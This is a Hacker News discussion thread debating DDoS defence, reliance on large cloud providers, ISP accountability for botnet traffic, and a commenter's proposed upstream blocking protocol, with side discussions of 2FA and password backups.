Hacker News new | past | comments | ask | show | jobs | submit login

The fact that large cloud providers can handle huge DDoS attacks I think in the long run leads to a worse internet. It forces botnets to up their game and for websites the only solutions available are to pay Google, Amazon or Cloudflare a protection tax.

I honestly don't see any other options, but I'd really wish for them to come through some community coordinated list of botnet infected IPs or something.




What?

Let's go back to username and password. 2FA forces scammers to up their game.

What about password managers? Having separate passwords to every account makes hacking into your accounts much harder and might hurt everyone in the long run.

And don't get me started on end to end encryption. Privacy, long term, will mean the fall of civilization.

Sarcasm aside. I think I understand your point in which we shouldn't just delegate to cloud providers the whole effort in preventing attacks, but just with everything production-grade, the average enterprise just isn't ready to deal with all the upfront cost to run your entire computing solution. Because it doesn't end with this type of mitigation and dependency. A similar argument could be made for not using proprietary chip designs made by cloud providers. Or any proprietary API solution for that matter. It really is a matter of convenience that a community solution might cover in the future, abstracting away fundamental building blocks every cloud provider must have (name resolution, network, storage and computing services) to provide such higher level functions without lock in. We are just not there yet.


> just with everything production-grade, the average enterprise just isn't ready to deal with all the upfront cost to run your entire computing solution

That’s not a fair point.

We’re not even trying to make the internet safe. There is zero (0) actions being taken to stop this madness. If you run a large website, you still regularly see attacks from routers compromised 3, 4, 5 years ago. Or how a mere few days of poking around smartly is still enough to this day to find enough open DNS resolvers to launch >500Gbps attacks with one or two computers.

Why are these threats allowed to still exist?

The only ones attempting something are governments shutting down booters (DDoS-as-a-service platforms). But that’s treating symptoms, not causes.

We will eventually need to do something, or it will be impossible to run a website that can’t be kicked down for free by the next bored skid.

Just like paying protection fees to the mafia was a status quo, this also is just that. A status quo, not an inevitability.

The solution is to finally hold accountable attack origins (ISPs, mostly), so that monitoring their egress becomes something they have an incentive to do.


I don't think it's true that 0 actions are being taken. When new vectors for amplification attacks are found, they get patched - you can't do NTP amplification attacks on modern NTP servers anymore, for example. But it takes a long time for the entire world to upgrade and just a handful of open vulnerable servers to launch attacks. And in the meantime people are always looking for new amplification vectors.

> The solution is to finally hold accountable attack origins (ISPs, mostly), so that monitoring their egress becomes something they have an incentive to do.

Be careful what you wish for. The sort of centralized C&C infrastructure and "list of bad actors everybody has to de-peer" that you would need to this effectively would we a wonderful juicy target for governments to go, "hey, add [this site we don't like] to the list, or go to prison".


> "hey, add [this site we don't like] to the list, or go to prison".

Aren't there already a dozen or so such lists? I don't see how one more list really increases the risk.

You can make the list public - most of the bad actors are obsolete, compromised equipment for which the owner is unaware of the problem. Once the list is public, it's pretty easy to detect anyone trying to abuse the list as a tool of censorship.


IP reputation is already a thing. And plenty enough ASNs are well-known for willfully hosting C2 servers and spam, DoS, etc sources…


Traditionally, a botnet can be compromised (at least largely) of actual consumer devices unknowingly making requests on their owners' behalf. This can cover hundreds of unrelated ISPs as the "origin" and is effectively indistinguishable from organic traffic to a popular destination. "Accountability" is not simple here.


> Traditionally, a botnet can be compromised (at least largely) of actual consumer devices unknowingly making requests on their owners' behalf.

And I do count that in.

Just because a user is the source of an attack unknowingly doesn’t make it right.

What would make it right is for there to be a more generalized remote blackholing system in place.

ie my site runs on an IP, is able to tell my ISP to reject traffic to it from $sources, and my ISP can send that request to the source ISP.

And if it makes my site unavailable to that other ISP because of CGNAT and 0 oversight, tough luck. Guess their support is getting calls so maybe they start monitoring obviously abusive egress spikes per-destination.


I like the irony of saying there are zero actions being taken in response to a blog post documenting actions taken to specific CVEs.


These blogposts document the attack. Documenting it and acting in it are different.

There’s no practical action being taken besides « use our profucts cause we can tank it for you » here.

The mitigations listed are better than nothing, but the fact that every skid out there can hire a botnet of a few thousands compromised machines (like here) and send you a few millions (say this protocol attack allowed a 100x higer than avg impact) rps is way enough to kill the infra of 99.99% websites. No questions asked.


>There is zero (0) actions being taken to stop this madness. If you run a large website, you still regularly see attacks from routers compromised 3, 4, 5 years ago

Yes, you're 100% correct. Back in the day when the main bot net activity was spam if you were infected and you started sending TB of spam the ISP would first block your outgoing smtp. If they kept getting complaints in a week or two they'd cut you off.

I remember 30 years ago when most people were on dialup, I was fortunate enough to have 128kB SDSL. As a relatively clueless kid I decided to portscan an IP range belonging to a mobile service company. Few days later my dad got a phone call saying their IDS flagged it and "don't do it or we'll cancel your service". For a port scan of few public IPs no less!

ISPs could definitely put a stop to 99% of these botnets, but until they see some ROI, why would they bother?


But that's exactly the problem, it shouldn't require a enterprise grade tool just to host a simple website on the internet. We've lost something due to our inability to stop attacks at the source and heavy overreliance on massive cloud providers to do it for us.

2FA and password managers didn't make us heavily reliant on massive companies.


Yes, but if these cloud providers didn't exist eventually there'd be botnets that no site could protect against, rather than the status quo of at least some sites being able to resist them. The idea that the existence of cloud providers that can soak up a lot of traffic is making things worse by causing botnets to get more powerful just seems silly.


you don't need enterprise grade tools just to host a simple website. however, if your simple site ever gains enough attraction to come under an attack, especially like this, you'll never survive. you can either just accept that your service will not survive the attack and just shut it down until the attackers realize mission accomplished and stops. you can then hope they don't notice when you bring it back. no simple site will be able to afford what's required to stay up from these attacks.

i'm not saying i like having to put the majority behind the services of 2 or 3 companies, but if you ever get shut down from some DDOS, you'll understand why people think they need to.


It won’t survive - until a day or so later you’ve migrated to one of the large providers who provide the protection.


A similar analogy can be made with the likes of westward expansion in the continental US.

Back then, you got a piece of land, and really could do what you wanted with it. Build a business, farm, etc. some government taxes but nothing crazy. But you had to deal with criminals, lack of access to medical care, and lack of education.

Now to do the same, you have a slew of building codes, regulations, zoning laws, and are basically forced to have municipal services. Higher Taxes to pay the roads, police force, fire fighters, education services etc.

However, home owners can still just have an egg or vegetable stand at the end of their driveway. It won’t be the same as having a storefront in town, but it’s still doable without the overhead.

Similarly, as the internet matures, we’re going to see more and more overhead to sustain a “basic” business.

But you can still have a personal blog ran in your closet, for lower-level traffic.

The analogy isn’t perfect, but unfortunately as threat-actor’s budgets increase, so too do their quality/sophistication of their attacks. If it was cheap to defend against some of the more costly attacks, they would find a different vector.

The answer, to me, is some tangential technology that is some mix of federated or decentralization. Not in a crypto bro sense, but just some tech whose fundamental design solves the inherit problem with how our web is built today.

Then threat actors will find another way, rinse and repeat…


> home owners can still just have an egg or vegetable stand at the end of their driveway

No you can't. That is illegal without a "cottage food" license, training, and labeling in most of the US.

https://www.pickyourown.org/CottageFoodLawsByState.htm


Child-run lemonade stands are technically illegal in most states (some have actually carved out exemptions for them because of overzealous policing).

Garage sales often have a specific carve out, also, and limitations on numbers of time per year, etc.

Most areas nobody cares at all until it becomes a nuisance somehow.


Selectively enforced laws are the worst kind of law.


I've always thought it would be interesting to allow as a defense against a violation of a law to prove that the law is regularly violated without consequence.

Because selectively enforced laws are just another way of saying you have a king at some level, the person who decides to enforce or not.


Selective prosecution is a defense under the Equal Protection clause of the Constitution.

However, the Supreme Court has left the prescribed remedy intentionally vague since 1996, which in turn makes the claims themselves less likely to be raised, and less likely to succeed.

https://wlr.law.wisc.edu/wp-content/uploads/sites/1263/2022/...


You have some control over this as an ordinary citizen. Next time you're on a jury for a lemonade stand violation, nullify.


Has a lemonade stand violation ever resulted in a jury trial in the US? I'm skeptical. In places that enforce those rules, usually what happens is that the cops tell the parent it isn't allowed, the kid shuts it down and there's no fine.


Or it turns into a giant PR disaster for the cops.


Don't tell that to the GDPR defenders.


I am a gdpr defender. I would like stricter enforcement.


Okay but does that mean anything regarding the parent commentor's analogy or the article?


20 years ago if a blog or website ended up on slashdot/digg/whatever there was a good chance it was going down. Scalable websites are a commodity today


That goes both ways. What was the price then to get a botnet with 10k nodes making 1k requests / second? What is the price today?


For the website or for the use of the botnet?


For the use of the botnet...


sure, It's no doubt an arms race. The prevalance of websites going down due to scaling issues feels like order of magnitude less than it was 20 years ago though. Purely anecdotal with no real data to back that up.


Because the majority of sites run on/behind:

- AWS

- Cloudflare

- Azure

- GCP

- Great Firewall of China

Maybe there was some truth about "the world market for maybe five computers", after all...


Sure, I fail to see how that invalidates my point


What I am saying is that we are getting "scalable websites" today individually, but it has cost us overall resiliency because most of us all are hiding behind the big providers. I am not so sure if this is a good trade-off.


> 2FA and password managers didn't make us heavily reliant on massive companies.

Retool: https://arstechnica.com/security/2023/09/how-google-authenti...

Lastpass: https://news.ycombinator.com/item?id=34516275


If Google Authenticator goes away, people will still be able to use 2FA (I for one use Aegis, it's available on F-droid and does everything I need, including encrypted backups)

If Lastpass goes away, people will still be able to use keepass or any of the large number of open source password managers, some of them even with browser integrations.

If I have a website that is frequently attacked by botnets and Cloudflare goes away, what can I use to replace it?


I am sorry, but if your password manager goes away and you have no disaster recovery scenario planned you might not be able to just move to a competitor:

https://news.ycombinator.com/item?id=31652650

My response was to illustrate how insidious big companies are.

Of course nothing compares to the backbone of the web going down. If AWS North Virginia suffers widespread downtime to all its availability zones, much of the web will just go dark, no question about it.


2FA, I’m not sure.

But Lastpass doesn’t represent the whole of password managers. Storing your passwords in an online service is a really silly thing to do (for passwords that matter at least). Use something local like keepass.


Hope you plan ahead for a house fire with a 3-2-1 approach for backups. Maintaining an always on off-site storage is expensive unless you resort to cloud solutions like OneDrive or Dropbox, but then you go back to the problem of having your passwords on the cloud, even if encrypted.

Not using cloud is just very expensive and time consuming for the average user.


Passwords are small enough that you can make physical backups easily.


Honest question, because it is interesting and might change how I approach backing up my passwords. How would you go about maintaing that physical copy updated?

What I think would make this approach hard is that you would have to ponder if a newly created account is important at creation time in order to know if you should update the off-site, physical copy of your most important passwords (I say this because if you want to backup everything and avoid the cloud entirely it is just not viable, having to update this physical backup for each new account. I am currently at over 400 logins in my pw manager, 2 years ago it was half as much).

I think having your passwords encrypted with a high enough entropy master password and a quantum-resistant encryption algorithm, and having an off-site, physical backup of your cloud account credentials is enough for anyone not publicly exposed, like a politician or someone extremely wealthy, even though I would be skeptical these people go through such lengths to protect their online accounts.


The lesson is not to "avoid" the cloud, but to not be "dependent" on it. Doubly so if the service provided is one that keeps you locked in and can not be ported over.

So yes, I feel comfortable with my strategy of having backups on bluray disks + S3. If AWS goes down or decides to jack up their prices to something unacceptable, I will take the physical copies and move then to the dozen others S3-compatible alternatives. I am not dependent on AWS.

But I am not interested in using Google Authenticator or Lastpass because that would mean that I am at their mercy.


LastPass is an issue - but even LastPass would let you export/print the passwords. So no hard dependency there*. Google Authenticator recently did something similar with QR codes.

* though OTP seeds don’t print, and you can’t export/print attachments. I don’t recommend LastPass for these and many other reasons.


With two usb sticks it’s not that much work to take one witha fresh backup to my mom when I visit and take the other one back and update that backup. At worst I lose one or two logins.


It doesn’t take enterprise grade tools to host a website.

It does take enterprise grade tools to defend against the largest DDoS ever attempted.

Those are not the same thing. And those DDoS’s often are aimed at things besides a HTTPS endpoint.


There should be a protocol to block traffic on the upstream provider. So if someone from 1.2.3.4 sends lots of traffic at you, you send a special packet to 1.2.3.4 and all upstream providers (including the provider that serves 1.2.0.0/16), that see this packet block traffic from that IP address directed at you. Of course, the packet should allow blocking not only a single address, but a whole network, for example, 1.2.3.4/16.

But ISPs do not want to adopt such protocol.


So I can deny service to your site with a single packet, instead of having to bother with establishing a whole botnet? The current botnet customers would be the first to advocate for this new protocol!


Simple! To prevent it being abused easily you could make it so you would need to send a high number of those packets for a sustained period in order to activate the block.


There is already an RFC we could apply, just implement forced RFC3514 compliance and filter any packets with the evil bit set.

https://datatracker.ietf.org/doc/html/rfc3514


And there could be a short time limit on that block, perhaps one hour, but even 60 seconds would be enough to completely flip the script on a DDoS.


You can only block access to your IP address, so you can ban someone from sending packets to you but not to anyone else. My proposal is well-thought and doesn't require any lists like Spamhaus that have vague policies for inclusion and charge money for removing. My proposal doesn't have any potential for misuse.


Sorry, this is not well-thought and certainly has potential for abuse. This is on IP and not domain? What is the signing authority and cryptography mechanism preventing a spoofed request?


When you send a "reject" packet, the imtermediate routers send back a confirmation code. You must send this code back to them to confirm that "reject" packet comes from your IP address. No cryptography or signing required.


I don't think you understand how networking operates at a packet level.


How can it protect from... botnets, where there are tens of thousands "someones"?


You can only ban packets coming to your IP. Botnet can only ban packets coming to its IP addresses.


It's not very hard to send packets with a fake source IP, especially if you don't care about the reply.


Seems easy enough to require (i.e. regulate) end-customer ISPs to drop any traffic with a source IP that isn't assigned to the modem it's coming from. This would at least prevent spoofing from e.g. compromised residential IoT devices. Are they not already doing that filtering? Is there any legitimate use-case to allow that kind of traffic?


Someone has to go and add the filtering. Nowadays (or maybe since ten years ago) most ISPs have the filter, but not the last 1% (or maybe 0.01%).


The routers can send back a confirmation token to confirm the origin address.


First of all, there is no way this works reliably for anything but the first hop. There is no way for a router to send a packet to you in a way where you can reply to that router unless you are connected directly to it, unless all ISP routers start being assigned public IP addresses. Additionally, there are normally many paths between you and your attacker, and there is no guarantee that packets you send will take the same path as the packets you were receiving. Especially as the routing rules get modified by your successful blocking requests.

That also means that every router now has to maintain a connection table to keep track of all of the pending confirmations, and to periodically check that table for expirations so it can clean it up. Maybe not that bad for a local router, but this is completely unworkable for routers handling larger parts of the internet.

And of course, anyone who has a tap into that level can trivially spoof all of the correct replies so it's still not a secure mechanism.


You can deny access only from your IP, not for anyone else.


IP addresses can be spoofed. So you’d need some kind of handshake to verify you are the owner of that IP. Which is going to be tough to complete if your network is completely saturated from the DDoS in progress.

I do think your idea has merit though. But it’s still a long way from being a well thought-out solution.


How do you verify the source address of the packet is legit?


The router can send back a confirmation code and you must send it back to confirm that request comes from your IP.

Also, on a well-behaved networks that do not allow spoofing IP addresses, this check can be omitted.


> The router can send back a confirmation code and you must send it back to confirm that request comes from your IP.

Ideally with the token packet being larger than the initial packet, so it can easily be abused for a reflection attack... ;-)

> Also, on a well-behaved networks that do not allow spoofing IP addresses, this check can be omitted.

This is already not true for most networks, and in your case would've to be true for all intermediate networks which is just impossible.

In another post you suggest this should also allow blocking entire networks; how do you prevent abuse of that?

Your suggestion is anything but well-thought, it's a pipe dream for a perfect world, but if we'd live in one, we wouldn't have ddos attacks in the first place.


Yeah, we should invent secure communication channels and crypto keys first...


This proposal only works if the packets are readable by every intermediate router. Or are you suggesting that you establish a TLS session with every router between you and the attacker?


What you say already exists, hell, you can use BGP to distribute ACLs

But it costs space in the routing tables and that means replacing routers earlier. It's no wonder, especially if you multiply it by thousand customers.

"block all traffic from outside from this IP" is significantly easier than "block all traffic from outside from this IP to this client". And you need to do it per ISP client, else it is ripe for abuse.

And don't forget a lot of the traffic will come from "cloud" itself.


> What you say already exists, hell, you can use BGP to distribute ACLs

But you should own an AS for that?

> But it costs space in the routing tables

Not implementing my proposal leaves critical infrastructure unprotected from foreign attacks. Make larger routing tables. Also, instead of blocking single IPs one can block /8 or /16 subnets.


Make larger routing tables.

Brilliant! Why didn’t we think of that?!? MOARE TCAMS!!!


if Cloudflare can do this on commodity hardware (stop attacks and block thousands of IPs), then router manufacturers who have custom hardware can do much more.

Also, in Russia for example, there is DPI inspection and recording of all Internet traffic and if it is possible in Russia, then West can probably do 10x more. Simply adding a blacklist on routers seems like an easy task compared to DPI inspection.


This can be made on a paid basis. For example, for $1/month a customer gets a right to insert 1000 records (block up to 1000 networks or IPs) into blacklist on all Tier-1 ISPs. For $100/mo you can withstand an attack from 100 000 IPs which is more than enough and Cloudflare goes bankrupt.


I just imagined this: isp's could make a isp.com?target=yourwebsite.org/fromisp [slow] redirecting url. If you receive unusual amounts of requests from the isp you redirect it though their website.

They can then ignore it until their server melts (which takes care of the problem) or take honorable action if one of their customers is compromised. The S stands for service after all.


It appears you don’t understand DDoS at all. There aren’t humans sitting behind browsers or scripts using browser automation software. No one cares about less respects your “redirect” because no one’s reading your response. Most of the time the attacks aren’t even HTTP, they are just packet floods.


> It appears you don’t understand DDoS at all.

I can confirm this. I see web pages talking about redirecting traffic to scrubbing centers.


> Of course, the packet should allow blocking not only a single address, but a whole network, for example, 1.2.3.4/16.

So, if my neighbour is infected and one of his devices is part of a botnet, I get blocked as well?


Yes. Because blocking several extra users on a bad network that has several infected hosts and does nothing about it is better than being under attack.


Block the whole country, then I guess you’ll see laws passed that IOT providers need to start updating at a better clip.


That already effectively happens in a lot of cases.


If the source field in a packet reliably indicated the source of the packet and a given IP was sending you a lot of unwanted traffic, you'd ask their ISP to turn them off and the problem would be solved. Maybe one day BCP38 will be fully deployed and that will work. I also dream of a day where chargen servers are only a memory. Some newer protocols are designed to limit the potential of reflected responses.

Null routing is available in some situations, but of course it's not very specific: hey upstreams (and maybe their upstreams), drop all packets to my specific IP. My understanding is null routing is often done via BGP, so all the things (nice and not) that come with that.

Asking for deeper packet inspection than looking at the destination is asking for router ASICs to change their programing; it's unlikely to happen. Anyway, the distributed nature of DDoS means you'd need hundreds of thousands of rules, and nobody will be willing to add that.

Null routing is effective, but of course it takes you IP offline. Often real traffic can be encouraged to move faster than attack traffic. Otherwise, the only solution is to have more input bandwidth than the attack and suck it up. Content networks are in a great position here, because they deliver a lot of traffic over symetric connections, they have a lot of spare inbound capacity.


> If the source field in a packet reliably indicated the source of the packet and a given IP was sending you a lot of unwanted traffic, you'd ask their ISP to turn them off and the problem would be solved

No. Your email will go straight into trash because ISP is not interested in doing something for people who don't pay them money. Also, even if they cooperate, it will take too much time.

> Null routing is available

Null routing means complying with criminals' demand (they want the site to become inaccessible).

> it's unlikely to happen

It will very likely happen if there will be a serious attack on Western infrastructure: for example, if there will be no electricity in a large city for several days, of if hospitals across the country won't work or something like this. Then the measures will be taken. Of course, while the victims are small non-critical businesses, nobody will care.

> Otherwise, the only solution is to have more input bandwidth than the attack and suck it up. Content networks are in a great position here, because they deliver a lot of traffic over symetric connections, they have a lot of spare inbound capacity.

So until my proposal is implemented the only solution is to pay protection money to unnecessary middlemen like Cloudflare.


Do you know what the first D in DDoS attack stands for?


I am pretty sure that protocol would be just as abused.


How exactly? You can authenticate sender by sending a special confirmation token back.


How does one get removed from the block list?

Say some IoT device that half of households own gets compromised and turned into a giant botnet. The news gets out and everyone throws away that device. Now they are still blocked over a threat that doesn't exist anymore... doesn't seem like a good situation for anyone.

I'd imagine that the website owners that want the attack stopped will soon want to figure out how to get traffic back since they need users to pay the bills.

Whats to stop someone from just making an app that participates in an attack when connected to public(ish) wifi networks and participating in attacks long enough to get those all shut off from major sites?

How does this stop entire ISPs from getting shut off when the attackers have managed to cycle through all the IP pools used for natting connections? (e.g. the Comcasts of the world that use cg-nat to multiplex very large numbers of people to very small numbers of IPs)?


> How does one get removed from the block list?

We can add an "accept" packet that lifts the ban.

Also, how do you remove yourself from blacklist when banned by Google or Cloudflare? I guess here you use the same method.

> Say some IoT device that half of households own gets compromised and turned into a giant botnet. The news gets out and everyone throws away that device. Now they are still blocked over a threat that doesn't exist anymore... doesn't seem like a good situation for anyone.

Not my problem. Should have thought twice before buying a vulnerable device and helping criminals. As a solution they can buy a new IP address from their ISP.


As much as I half-wish there was something like this, it does sound like email spam blacklists all over again.


Yes, what the OP is saying is related to one of the paradoxes of security/defence, i.e. the fact that the more one increases its defences (like Google is doing) then the more said increase of defences also pushes one's adversary to increase its offence capabilities. Which is to say that Google playing it safer and safer actually causes their potential adversaries to become stronger and stronger.

You can see those paradoxes at play throughout the corporate world and especially when it comes to actual combat/war (to which actual combat/war these DOSes might actually be connected). For example the fact that Israel was relatively successful in implementing its Iron Dome shield only incentivised their adversaries to get hold of even more rockets, so that the sheer number of rockets alone would be able to overwhelm said Iron Dome. That's how Hamas got to firing ~4,000 rockets in one single day recently, that number was out of their league several years ago when Iron Dome was not yet functional.


It's the opposite, the number of rocket was growing and hence the Iron Dome was developed. The Israelis saw the writing on the wall and acted accordingly. The laser system will be operational soon and then it will cost 1$ per shot.


Unless it's cloudy outside.


> Let's go back to username and password. 2FA forces scammers to up their game.

Let's do it. It works for the website you're using right now. 2FA was in large part motivated by limiting bot accounts and getting customers phone number.

I can't imagine how much productivity the economy loses every day due to 2FA.


Is this sarcasm? If not please provide some more details on why you think "2FA was in large part motivated by limiting bot accounts and getting customers phone number". I never used a phone number for 2fa. Mostly TOTP. Bots could do that too. I don't see the connection.

>I can't imagine how much productivity the economy loses every day due to 2FA.

Is it really that much? Every few days I have to enter a 6 digit number I generate on a device I have with me all the time. Writing this comment took me as much time as using 2fa for a handful of services for a month.


> ? Every few days I have to enter a 6 digit number I generate on a device I have with me all the time.

I use more than one service a day, and some infrequently, so for me about every day I have a minute or two where I try to login, need to find my phone (it's not predictable when it will ask), and then type it in. This happens to every person several times a day!

I also now must carry a smart phone with me to participate in society.

But the main drag is that when people lose or break their phones the response is: "just don't do that" and the consequences range from losing your account to calling customer service.

> Mostly TOTP. Bots could do that too. I don't see the connection.

Most people using 2FA do not use TOTP, they use a phone number.

Bots could use TOTP, it's more infrastructure, and it's a proof of work function for them to login.


While I don't take starcraft2wol's theory seriously, there are a bunch of services that have made phone numbers essentially mandatory. They claim this is to "protect your account".

You sign up for a Skype account or Twitter account and decline to give your phone number, instead choosing a different form of 2FA? In my experience your account will be blocked for 'suspicious activity' even if you have literally no activity.


And you still don't take my theory seriously :)


To add, password managers provide great coverage of almost every problem 2FA is. supposed to solve and it improves the workflow your grandma already know (writing passwords on a sheet). The only difference is Google doesn't get any money when you run a script on your own computer.


> It works for the website you're using right now

It doesn't, you can regularly see people getting their accounts stolen here. This wouldn't be possible (or at least this trivial) with any competent implementation of 2fa.


> Privacy, long term, will mean the fall of civilization.

I'm curious about your rationalization for this. Lack of privacy will also mean the fall of civilization. Civilization is just doomed to fail at one point or another. All things come to an end.


This was me being sarcastic. Of course we need privacy, not because we have things to hide, but because individuality can only flourish without constant surveillance.

Yes! All things come to an end and that is why some recent philosophers think that Plato was naive to think it could minimize or erradicate society rotting. This is where negative utilitarianism comes in, where the point of society is not to maximize happiness (and therefore prevent society from collapsing) but to minimize suffering (and therefore provide mechanisms to minimize damages from transitions between organization forms when society collapses). I have to refer you to Karl Popper's The Open Society for this, because needless to say this answer is very reductionist.


Ah I just missed the sarcasm. Yeah, and when the sole goal is to minimize suffering, tyranny is introduced.

"Those who would give up essential liberty, to purchase a little temporary safety, deserve neither liberty nor safety."


This discussion is somewhat reminiscent of "Don't hex the water"..

https://www.youtube.com/watch?v=Fzhkwyoe5vI


None of your examples are valid, IMO.

Procuring and operating the infrastructure to mitigate this kind of attack costs many many thousands of dollars or requires becoming part of the Cloudflare/AWS/Google hive.

Joe Schmo can set up a TOTP server, run keepass/bitwarden and use letsencrypt for free (or another SSL provider for cheap).

The lament from parent is that running a simple blog reliably shouldn't require being inside Cloudflare's castle walls or building your own castle.

---

My personal observation is that simple websites should continue operating HTTP1!


That's not a valid comparison, since there are various effective decentralized 2FA methods available – unlike for DDoS protection.


Most of them are dynamic IPs. Some of them are infected mobile devices.

What happens when you log an attack from a device that is attacking you from a school or business WiFi network? Block the whole IP forever?

What if the user is on a CGNAT. Are you going to block the edge proxy for that entire ISP?

What if you're getting hit from a residential connection that gets a new rotated IP every couple of weeks? Block whoever gets that IP from now on?

Your solution doesn't stop attacks. It just stops regular users.


> What happens when you log an attack from a device that is attacking you from a school or business WiFi network? Block the whole IP forever?

No, but for a day perhaps.

> What if the user is on a CGNAT. Are you going to block the edge proxy for that entire ISP?

Maybe. If the ISP doesn’t bother doing anything about it (which is THEIR job, not mine as a website operator).

If the ISP can’t be arsed to do their job, why am I supposed to care about them at all?

> What if you're getting hit from a residential connection that gets a new rotated IP every couple of weeks? Block whoever gets that IP from now on?

Same as the CGNAT one. It’s the ISP’s job to handle their misbehaving customers.

If they refuse to do it and get complaints from their other customers that they’re getting blocked, maybe they’ll actually get to it.

> Your solution doesn't stop attacks. It just stops regular users.

No. It puts pressure on the ISPs to finally stop whining loudly when they receive an attack while closing their eyes on any attack originating from their network.

This is not sustainable.


Trust me when I say that you don't want the ISP's to inspect web traffic. That is not how to solve this. That is costly for the ISP and will drive up costs. It also makes supporting a website impossible. The ISP is assumed by all parties to be impartial. That assumption is required for the internet to be operational. Sure it might function your way, but it would be impossible to support.

And maybe Facebook and Google are big enough to push around the ISP's, but they are the only ones. Nobody will bat an eyelash if 15,000 Comcast users in Phoenix AZ can access your hokey-pokey website. Comcast doesn't care. The users won't blame their ISP. They will blame you, or whoever owns the hokey-pokey website. If you want traffic, you need to be equipped to handle traffic. You are the one with the internet facing infrastructure.

You are the one blocking traffic. Not the ISP. That is how it should be. The ISP should be impartial. You pay for connectivity. Consider yourself connected. For better or for worse. You are responsible for what you put onto that connection.


> Trust me when I say that you don't want the ISP's to inspect web traffic.

They do already. DPI on port 53 for DNS blocks or SNI inspection are common place. So are IP blocks.

> If you want traffic, you need to be equipped to handle traffic. You are the one with the internet facing infrastructure.

Slightly misleading wording here. More accurately your point is: « you want to run a website? Better have the infra to support traffic spikes comparable to that of a tech giant ». 400M rps would cost an unfathomable amount of money to be able to handle even just while dropping all packets.

> And maybe Facebook and Google are big enough to push around the ISP's, but they are the only ones. Nobody will bat an eyelash if 15,000 Comcast users in Phoenix AZ can access your hokey-pokey website.

Obviously yes. Too bad it’s better business for everyone to say nothing and just recommend you use their product.


ISP needs to start taking much more responsibility, currently they do not care or choose not to care to avoid having to deal with upset customers.

The fact that millions, if no more, devices can continue to access the internet regardless of how long they are compromised, is just crazy. I get that it put more responsibility upon end users to secure their devices, if they otherwise run the risk of get thrown of the internet, but I currently fail to see other options. Our device security still isn't good enough that we can just use them with reckless abandonment.

Any "solution" that attempts to fix the problem of increasing DDoS attacks and their damage that doesn't address the issue of compromised devices being allowed to roam free on the internet is a band aid at best.

And I can almost hear people complain that I'm arguing to throw compromised IoT, SCADA and monitoring devices of the internet, and yes I am. None of these things have any business being exposed to the public internet anyway.


Either the ISPs are common carriers that follow some sort of basic rules, or they try to make people happy and end up stepping all over people randomly.

Currently there are zero rules (outside of a ISP ToS maybe) that forbids what you’re talking about. Pretty much anywhere I think? Unless you know of a law against having a infected or out of date computer connected to the internet?

There really is no way to have both. The current situation, they generally only deal with problem cases that get reported to them. And I doubt anyone is going to bother doing so for the 20k machines in this attack.


It is not an ISPs job to analyze traffic patterns and attempt to stop the bad ones. Thats like saying its the job of the road crews to stop speeders


So who else? My proposal would be to have companies like Google, Microsoft, Amazon and hosting providers be able to report sources of DDoS attack to the ISPs who can then identify the customer and let the customer know that they have a week to fix the issue or lose connectivity.


That is terrifying.

Let Google, Amazon, and Apple decide who gets to use the internet and who gets put into a list.

That is way worse than giving Google the W3C. That is literally just handing them the internet and making everybody else on it subservient to Google.


Or that it's the ISP's job to cut off accounts that are downloading copyrighted works, or hashing cryptocurrency without paying taxes, etc.

It would be nice if the cell phone provider could send a text message reporting the problem. But how to distinguish it from spam?


> > What happens when you log an attack from a device that is attacking you from a school or business WiFi network? Block the whole IP forever?

> No, but for a day perhaps.

Then that's also a DDoS attack vector.


The idea clearly needs some work.

But, a slight defense of it—the really big providers can already sink a massive DDoS anyway. So, this is just a scheme to help little websites. It doesn’t really matter if a school, or even a cellphone network, can’t access my little website for an afternoon.

You’d have to decide if you want to send the block request. If you are hosting your personal blog, you’ll probably go for it regardless. If you are providing a small service; hosting git for a couple friends or whatever, you’ll probably block with some discretion.


The only answer is publicly-resourced protection and it's not that weird when you think about it. My apartment has a basic lock that any locksmith can undo and I'm safe because of my community and government protection (police, mental healthcare, justice system, etc...). Seems like the same logic should apply to my website or other digital property.


ISPs will gladly quarantine/rate limit folks for pirating stuff, why don't they use those tools to combat botnets? Though I could see this leading to a slippery slope of remote attestation for internet access.


> why don't they use those tools to combat botnets?

Because they probably don't care.


Community yes. Government protection no. When was the last time you heard of police stopping a break-in or making a successful investigation ?

Independent of police, in bad communities your neighbors are willing to break in. In good communities they don't.


Where this breaks down is that because of the nature of the internet and DDoS attacks it’s not something that can easily be solved with better policing - even identifying a perp might be near-impossible, and they might be in another country anyways. The government does try to prosecute botnets and DDoS attacks today, but it’s of limited success. Is there a practical solution here I’m missing?


I don't know about a "practical solution", but there are research efforts to think about new ways to build internets that mitigate some of these problems.

Here is one that I'm aware of: https://named-data.net


Why don't we just require major providers to provide a realtime list of IPs that are attacking so that we can drop them in a block list with an expiration date of a month or so.

If your computer is infected, I don't want to talk to you for a month. If it continues to be infected, I might up that to a year, or permanently ban you.

It's your problem. Go fix it.


I've been on the receiving end of "Your" (dynamic) "IP has been blocked."

I would greatly prefer not having my semi-randomized IP blocked because someone used it maliciously a year ago.


Key phrase: "a year"

If anybody is suggesting permanent bans of IPs, it's not me, at least not at a public level. I may very well choose privately to do that.

To clarify, I, personally chooses a blacklist policy. Not some other org. I think if you offload this onto any kind of external structure, it breaks again.

ADD: We make publicly-available, second-by-second, how the internet is broken and invite all comers, including me and my blocklist, to help fix it.

There's a huge commerical interest in NOT fixing the problem of random crap showing up, from dancing cats selling things to targeted inserted ads. I get it. We saw this same thing happen with adblockers. It's now going on with "free" VPNs. Can't fight that perverse incentive, so don't fight it.


Thing is, don’t care.

The problem is that ISPs whose customers are originating the attacks from don’t give a shit.

If we have to give up 1% of legitimate traffic to thwart 90% of attacks, it is a good deal.

If you and other customers complain to your ISP (or switch), eventually they’ll do something about it.

We can’t seriously keep on accepting that « thousands of compromised devices » is a fine reality for a « small botnet ».

These devices should be quarantined.


Sounds like a really great way to potentially destroy someone's career if they aren't terribly competent and you are. Infect some component in their home network that they don't even know is smart-enabled, and keep breaching their new devices, adding them to an active and conspicuous botnet. The only recourse for average Joe is to find expert help, which isn't really in abundant supply if you are a semi-sophisticated malicious actor.

I don't even want to think about the ramifications for small and medium sized businesses. Realistically, how much would it cost to be able to completely destroy a local competitor by paying someone to orchestrate a few events in succession.


This is an odd argument. The net is currently broken in many ways. One of the many ways is fake negative reviews. They easily destroy small businesses.

As I understand your argument, because the net has solid endpoints we can identify and isolate, we should ignore that fact. Instead we should create more and more complex systems to work around bad actors?

Bad actor takes control of grandma's computer. We should do all sorts of things except stop talking to grandma's computer? The thing, I would suspect, that most people would expect?

